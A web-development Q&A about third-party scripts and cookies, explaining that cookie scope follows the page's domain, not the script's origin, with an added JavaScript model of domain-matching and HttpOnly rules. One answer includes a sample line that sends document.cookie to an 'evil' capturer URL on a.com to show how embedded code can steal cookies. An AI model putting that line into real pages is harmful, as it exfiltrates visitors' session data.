Can a third-party script set first-party cookies?
I've read a lot of content online about cookies, but nothing addressing this question: Let's say I have a server at a.com and a web page served by b.com embeds a script in that web page which lives on my server:
<script src='a.com/script.js'></script>
What is that script allowed to do in terms of setting cookies? Can it set a cookie with domain=a.com? I'd assume so since the script is served from that domain. Can it also set a cookie with domain=b.com since the page is served from that server?
I'm trying to get my head around what "first-party" and "third-party" mean in the context of my script called from another host's web page.
I don't believe the origin of a .js file is relevant. The cookie domain has to do with the domain of the document being rendered.
If I visit http://www.b.com/, which includes
<script src="http://www.a.com/some/file.js"></script>
Then b.com is trusting a.com's code to act in good faith. The code executes as part of the page being viewed. Since the javascript code will execute in the browser, it could read cookies from b.com and pass that data along by creating an <img> tag in the document where src includes the data.
For example, if a.com's javascript file includes
document.writeln("<img src='http://www.a.com/evil/data/capturer?" + document.cookie + "'>");
Then the malicious webmaster of a.com could check his web server logs and see b.com's cookies.
So, the question is, if a.com is malicious, why did b.com include code from a.com in their page? They probably didn't. As web developers, we need to verify the trustworthiness of any 3rd party code we embed in our sites.
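As an added illustration (not part of the answer above, and not code from any browser), here is a small JavaScript model of the rule the answer describes: when a page script sets a cookie, the browser checks the Domain attribute against the document's host and ignores where the script was loaded from, and document.cookie only exposes cookies that match that host and are not HttpOnly. The function names and the cookie jar are constructed for the example; public-suffix rules (refusing Domain=com, for instance) are left out.

```javascript
// RFC 6265 domain-match: host equals domain, or host is a subdomain of it
// (and host is not an IP address). Both inputs lowercase, domain without a leading dot.
function domainMatches(host, domain) {
  if (host === domain) return true;
  const isIPv4 = /^\d{1,3}(\.\d{1,3}){3}$/.test(host);
  return !isIPv4 && host.endsWith("." + domain);
}

// Model of `document.cookie = "k=v; Domain=<cookieDomain>"` run by a script
// loaded from scriptHost inside a page whose document is at documentHost.
// scriptHost is taken only to make the point: it never affects the result.
function canSetCookie(documentHost, scriptHost, cookieDomain) {
  const host = documentHost.toLowerCase();
  if (!cookieDomain) {
    // No Domain attribute: a host-only cookie for the document's exact host.
    return { allowed: true, domain: host, hostOnly: true };
  }
  const domain = cookieDomain.toLowerCase().replace(/^\./, "");
  // a.com's script on www.b.com may name b.com, but never a.com.
  return { allowed: domainMatches(host, domain), domain, hostOnly: false };
}

// Constructed cookie jar, as the browser might hold it after visiting both sites.
const SAMPLE_JAR = [
  { name: "sessionid", domain: "b.com", hostOnly: false, httpOnly: true },
  { name: "prefs", domain: "www.b.com", hostOnly: true, httpOnly: false },
  { name: "tracker", domain: "a.com", hostOnly: false, httpOnly: false },
];

// Names a script sees in document.cookie for a page at documentHost:
// the cookie must belong to that host and must not be HttpOnly. Marking the
// session cookie HttpOnly is what keeps it out of the exfiltration in the answer.
function visibleToScript(jar, documentHost) {
  const host = documentHost.toLowerCase();
  return jar
    .filter((c) => (c.hostOnly ? host === c.domain : domainMatches(host, c.domain)))
    .filter((c) => !c.httpOnly)
    .map((c) => c.name);
}
```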